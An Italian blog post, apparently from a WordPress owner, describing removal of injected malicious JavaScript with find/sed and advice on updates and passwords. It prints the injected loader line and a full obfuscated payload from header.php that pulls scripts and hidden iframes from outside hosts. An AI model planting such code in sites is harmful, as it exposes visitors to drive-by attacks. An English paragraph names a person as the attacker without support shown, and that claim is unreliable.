document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Y2K.js"></scri'+'pt>')

Come rimuoverlo?!

Ho quindi scoperto ed utilizzao il comando “sed” che permette (oltre a un milione di altre cose!) di fare un find/replace sui documenti o, ancora meglio nel mio caso, eliminare una riga da un file.

Ho quindi eseguito un find su tutti i file .js; se il file contiene la stringa “nuttypiano” elimina tutta la riga.

find -name \*.js -exec sed --in-place=bak '/nuttypiano/d' {} \;

L’opzione “–in-place=bak” crea un file di backup del file modificato al fine di evitare eventuali danni irreparabili! il file modificato si troverà nella medesima directory dell’originale trasformato da “miofile.js” a “miofile.jsbak”

Adesso rimane da capire come abbiano fatto ad entrare sul server… controllare i log, controllare i log…

Nel frattempo consiglio di modificare tutte le password e di tenere SEMPRE worpress aggiornato all’ultima versione, compresi i plugin installati.

Però, usando firebug, capita di vedere che esiste una richiesta che parte per un sito, itsallbreaksoft.net

Bene, non si sa esattamente come questi cari signori riescano a scrivere sul file header.php del tema che avete impostato, ma li sta il danno.

troverete alla fine del tag </head> un bello script javascript:

<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1')</script>

A questo punto è sufficiente cancellare lo script e assicurarsi di mettere il file header.php in sola lettura… rimane da scoprire come abiano fatto, se usano un particolare plugin falloso per accedervi o se è un bug di qualche versione di worpress. Sicurameten assicuratevi sempre di fare l’aggiornamento del vostro WP.

It turns out that the people behind this seem to be a pretty well-known group from Russia, with the main person being one Sergey Ryabov, who uses the email address director at climbing-games dot com. [Ed. Note: We'd love to talk with Mr. Ryabov, to learn more about his operations and how and why he's able to pull off this kind of hijinx.]

Ringrazio theinternetpatrol.com per la segnalazione